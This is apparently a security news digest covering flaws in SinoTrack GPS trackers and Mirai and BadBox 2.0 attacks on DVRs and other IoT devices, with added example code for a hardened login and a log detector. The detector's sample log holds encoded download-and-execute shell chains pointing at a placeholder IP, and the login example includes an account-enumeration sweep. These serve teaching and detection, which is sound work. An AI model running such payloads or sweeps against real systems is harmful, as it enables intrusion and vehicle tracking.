CyberSecurity news

FlagThis - #iotsecurity

Pierluigi Paganini@Security Affairs //
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory on two vulnerabilities in SinoTrack GPS tracking devices. The flaws could let an attacker track a vehicle's location and trigger some of the remote functions the platform exposes on it. They affect all known SinoTrack devices and the SinoTrack IOT PC Platform. The advisory follows disclosure of the weaknesses by independent researcher Raúl Ignacio Cruz Jiménez.

The two issues are a weak authentication flaw (CVE-2025-5484) and an observable response discrepancy (CVE-2025-5485). The weak authentication comes from a single default password shared across all devices, combined with the use of the device identifier as the username. That identifier is printed on the receiver, so anyone with brief physical access to the unit, or with a photograph of it posted online, already has the username. The observable response discrepancy is in the web interface's handling of logins: it responds differently depending on whether a username exists, and because usernames are numeric identifiers of up to 10 digits, an attacker can enumerate valid accounts simply by iterating through candidate numbers.

Successful exploitation could give an attacker access to device profiles through the web management interface, and from there to the remote functions the platform exposes on the connected vehicle: at minimum tracking its location and, in some cases, cutting power to the fuel pump. CVE-2025-5485 carries a CVSS v4 base score of 8.8. No vendor fix is available; CISA advises users to change the default password immediately and to keep the device identifier out of sight, in particular out of photographs posted online. SinoTrack has not yet responded to CISA's request.
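The two weaknesses described above, the default credential and the username-revealing login response, are easy to reproduce and to fix in a login handler. The following is an added example, not SinoTrack's code or anything published by CISA or the researcher: a hypothetical tracker back end with a leaky login next to a hardened one, plus the enumeration sweep an attacker would run against each. The device IDs, the "123456" default and the PBKDF2 parameters are all assumptions made for the example.

```python
import hashlib
import hmac
import secrets

# Constructed account store for a hypothetical tracker back end: the username is
# the numeric device ID printed on the unit, the pattern the advisory describes.
# IDs and passwords here are made up.
DEFAULT_PASSWORD = "123456"   # assumed vendor-wide factory default
ITERATIONS = 20_000           # kept low for the example; use a slow KDF in production


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_user(password: str) -> dict:
    salt = secrets.token_bytes(16)
    return {"salt": salt, "hash": _hash(password, salt)}


USERS = {
    "9012345678": make_user(DEFAULT_PASSWORD),                # factory default never changed
    "9012345680": make_user("correct horse battery staple"),  # owner set a real password
}


def login_leaky(device_id: str, password: str) -> str:
    """The weak pattern: a distinct message tells the caller whether the
    username exists (observable response discrepancy), and the factory
    default password is accepted like any other."""
    user = USERS.get(device_id)
    if user is None:
        return "unknown user"
    if _hash(password, user["salt"]) == user["hash"]:
        return "ok"
    return "wrong password"


# Decoy record so the unknown-user path costs the same as a real lookup.
_DECOY = make_user(secrets.token_hex(16))


def login_hardened(device_id: str, password: str) -> str:
    """One failure message for every cause, constant-time digest comparison,
    and a forced reset when the stored credential is still the default."""
    user = USERS.get(device_id, _DECOY)
    matched = hmac.compare_digest(_hash(password, user["salt"]), user["hash"])
    if user is _DECOY or not matched:
        return "invalid credentials"
    if hmac.compare_digest(_hash(DEFAULT_PASSWORD, user["salt"]), user["hash"]):
        return "password change required"
    return "ok"


def enumerate_ids(login, start: int, count: int) -> list[str]:
    """What an attacker does against the leaky endpoint: sweep consecutive
    numeric IDs with a junk password and keep every ID whose reply differs
    from the unknown-user baseline."""
    baseline = login("0", "not-the-password")   # ID 0 assumed unassigned
    return [str(n) for n in range(start, start + count)
            if login(str(n), "not-the-password") != baseline]
```

Run `enumerate_ids(login_leaky, 9012345670, 20)` and both valid IDs fall out of a twenty-request sweep; the same sweep against `login_hardened` learns nothing, and the account that still has the factory password cannot be used until it is changed. Rate limiting per source address and per device ID belongs on top of this, since a uniform response only removes the oracle, not the ability to brute-force.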



References :
  • hackread.com: US CISA reports critical vulnerabilities in SinoTrack GPS devices that could let attackers remotely control vehicles and track locations.
  • securityaffairs.com: Two vulnerabilities in SinoTrack GPS devices can allow remote vehicle control and location tracking by attackers, US CISA warns.
  • The Hacker News: Two security vulnerabilities have been disclosed in SinoTrack GPS devices that could be exploited to control certain remote functions on connected vehicles and even track their locations.
  • ciso2ciso.com: CISA Warns of Remote Control Flaws in SinoTrack GPS Trackers – Source:hackread.com
  • thecyberexpress.com: US CISA reports critical vulnerabilities in SinoTrack GPS devices that could let attackers remotely control vehicles and track locations
  • www.helpnetsecurity.com: SinoTrack GPS vulnerabilities may allow attackers to track, control vehicles
Classification:
  • HashTags: #GPS #VehicleSecurity #IoT
  • Company: SinoTrack
  • Target: Vehicles
  • Product: SinoTrack GPS
  • Feature: Weak Authentication
  • Type: IoT
  • Severity: Critical
Mike Moore@techradar.com //
A new wave of attacks is targeting Internet of Things (IoT) devices through both a Mirai botnet variant and the BadBox 2.0 malware. Researchers have found a new Mirai variant exploiting CVE-2024-3721, a command injection vulnerability in TBK DVR devices that lets an unauthenticated attacker run shell commands on the recorder and so deploy malicious code on digital video recording systems commonly used for surveillance. Kaspersky GReAT has described the new features of this variant and notes that the latest infections specifically target TBK DVR devices.

Simultaneously, the FBI has issued a warning about the dangerous BadBox 2.0 malware, which has already infected over a million devices, including smart TVs, streaming boxes, digital projectors, and tablets. These devices, often cheap, off-brand, Android-powered units, are being hijacked to form a global botnet used for malicious activities such as ad fraud, click fraud, and distributed denial-of-service (DDoS) attacks. The compromised devices are turned into residential proxies, which are then sold or provided for free to cybercriminals, enabling a wide range of illicit activities.

The Mirai variant abuses the TBK DVR flaw to execute system commands without authorization. A single POST request to the vulnerable endpoint carries URL-encoded shell commands that download an ARM32 binary and execute it, so exploitation and payload delivery happen in one step and no separate reconnaissance of the target is needed. BadBox 2.0, by contrast, usually arrives preloaded on the device or is introduced through malicious firmware updates and Android applications. Either way, the infected devices join a botnet that criminals rent out for a range of abuse, which is why exposed IoT devices remain a persistent problem.
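The single-request pattern above (an encoded shell chain that fetches and runs a binary) is also what makes this kind of exploitation easy to spot in a web access log or WAF feed. The following is an added example and not code from Kaspersky or any of the sources listed: a small detector that URL-decodes every query and body parameter of a request and flags values containing a download-and-execute chain. The page does not name the vulnerable TBK endpoint, so the matcher keys on the decoded content rather than on a URL; the paths, parameter names and IP addresses in the sample log are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed request log: (source_ip, method, request_target, body).
# Paths, parameter names and addresses are made up for this example.
SAMPLE_REQUESTS = [
    ("192.0.2.10", "POST", "/api/system?opt=sys&cmd=status", ""),
    ("192.0.2.11", "GET", "/api/notes?text=curl+is+my+favourite+tool", ""),
    ("198.51.100.7", "POST",
     "/api/system?opt=sys&cmd=cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F203.0.113.5%2Farm7%3B%20chmod%20777%20arm7%3B%20.%2Farm7",
     ""),
    ("198.51.100.8", "POST", "/api/system",
     "opt=sys&cmd=cd+%2Ftmp%3Bcurl+-O+http%3A%2F%2F203.0.113.5%2Fx%3Bsh+x"),
]

DOWNLOADERS = ("wget", "curl", "tftp", "ftpget")
SHELL_SEPARATOR = re.compile(r"[;&|`]|\$\(")
EXEC_HINT = re.compile(r"chmod\s+(?:\+x|[0-7]{3,4})|\./\S+|\bsh\s+\S+")


def decoded_values(target: str, body: str) -> list[str]:
    """Every URL-decoded parameter value from the query string and a
    form-encoded body, plus the whole decoded query and body so that a
    payload hidden in a malformed pair is still seen."""
    query = urlsplit(target).query
    values = [v for _, v in parse_qsl(query, keep_blank_values=True)]
    values += [v for _, v in parse_qsl(body, keep_blank_values=True)]
    values += [unquote_plus(query), unquote_plus(body)]
    return values


def is_download_and_execute(text: str) -> bool:
    """True for a shell chain that fetches a file and then runs it: a command
    separator, a download tool and an execution step all in one value."""
    return (SHELL_SEPARATOR.search(text) is not None
            and any(tool in text for tool in DOWNLOADERS)
            and EXEC_HINT.search(text) is not None)


def flag_requests(requests) -> list[tuple[str, str, str, str]]:
    """Return (source_ip, method, path, decoded payload) for each request
    whose parameters carry a download-and-execute chain."""
    hits = []
    for src, method, target, body in requests:
        for value in decoded_values(target, body):
            if is_download_and_execute(value):
                hits.append((src, method, urlsplit(target).path, value))
                break
    return hits


if __name__ == "__main__":
    for src, method, path, payload in flag_requests(SAMPLE_REQUESTS):
        print(f"{src} {method} {path}: {payload}")
```

Decoding before matching is the important part: the separators and tool names are all percent-encoded in the raw request line, so a filter that looks at the undecoded URL sees nothing. The benign note containing the word "curl" is not flagged because it has no separator and no execution step, which keeps the rule from firing on ordinary text fields.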



References :
  • cyberpress.org: New Mirai Botnet Variant Exploits TBK DVR Vulnerability to Deploy Malicious Code
  • The Record: TV streaming devices, digital projectors and other IoT devices are being infected with BadBox 2.0 malware after the original campaign was stifled by German law enforcement.
  • Securelist: Analysis of the latest Mirai wave exploiting TBK DVR devices with CVE-2024-3721
  • cyberinsider.com: New Mirai Botnet Variant Targets Flaw in 50,000 Exposed TBK DVRs
  • Cyber Security News: Cybersecurity researchers have discovered a new variant of the notorious Mirai botnet that exploits a critical vulnerability in TBK DVR devices to deploy malicious code remotely.
  • gbhackers.com: New Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution
  • securityonline.info: New Mirai Botnet Variant Targets DVR Systems via CVE-2024-3721
  • www.bleepingcomputer.com: A new variant of the Mirai malware botnet is exploiting a command injection vulnerability in TBK DVR-4104 and DVR-4216 digital video recording devices to hijack them.
  • securityaffairs.com: BadBox 2.0 botnet infects millions of IoT devices worldwide, FBI warns
  • securityaffairs.com: New Mirai botnet targets TBK DVRs by exploiting CVE-2024-3721
@securityonline.info //
GreyNoise has observed a surge of roughly three times the typical level in exploitation attempts against TVT NVMS9000 DVRs. Activity peaked on April 3, 2025, with more than 2,500 unique IP addresses scanning for vulnerable devices. The flaw being exploited is an information disclosure weakness that lets an unauthenticated attacker obtain administrative access to the device, effectively bypassing authentication and leaving it open to unrestricted command execution. Several prior reports, including a GreyNoise update in early March 2025, had already identified the NVMS9000 as a botnet recruitment target.

The exploitation activity is strongly suspected to be associated with the Mirai botnet, a notorious threat known for targeting vulnerabilities in IoT devices. GreyNoise has identified sufficient overlap with Mirai to support this attribution. Manufactured by TVT Digital Technology Co., Ltd., based in Shenzhen, the NVMS9000 DVRs are used in security and surveillance systems for recording, storing, and managing video footage from security cameras. The company reports serving customers in over 120 countries.

The majority of the malicious IP addresses involved in the exploitation attempts originate from the Asia-Pacific (APAC) region, specifically Taiwan, Japan, and South Korea. However, the top target countries are the United States, United Kingdom, and Germany. Organizations using the NVMS9000 DVR or similar systems are advised to take immediate action to secure their devices. Recommended mitigations include blocking known malicious IP addresses, applying all available patches, restricting public internet access to DVR interfaces, and closely monitoring network traffic for signs of unusual scanning or exploitation attempts.



References :
  • The GreyNoise Blog: GreyNoise Observes 3X Surge in Exploitation Attempts Against TVT DVRs — Likely Mirai
  • BleepingComputer: New Mirai botnet behind surge in TVT DVR exploitation
  • securityonline.info: TVT DVRs Under Siege: Massive Exploitation Attempts Expose Critical Flaw
  • The DefendOps Diaries: Explore the resurgence of the Mirai botnet, its global impact, and advanced exploitation techniques targeting IoT devices.
  • Cyber Security News: GreyNoise has detected a significant rise in exploitation attempts targeting TVT NVMS9000 DVRs, a line of digital video recorders primarily used in security and surveillance systems.
  • www.scworld.com: Deluge of TVT DVR exploitation attempts likely due to Mirai-based botnet
  • bsky.app: A significant spike in exploitation attempts targeting TVT NVMS9000 DVRs has been detected, peaking on April 3, 2025, with over 2,500 unique IPs scanning for vulnerable devices.
  • cyberpress.org: Mirai Botnet Variant Targets TVT DVRs to Seize Administrative Control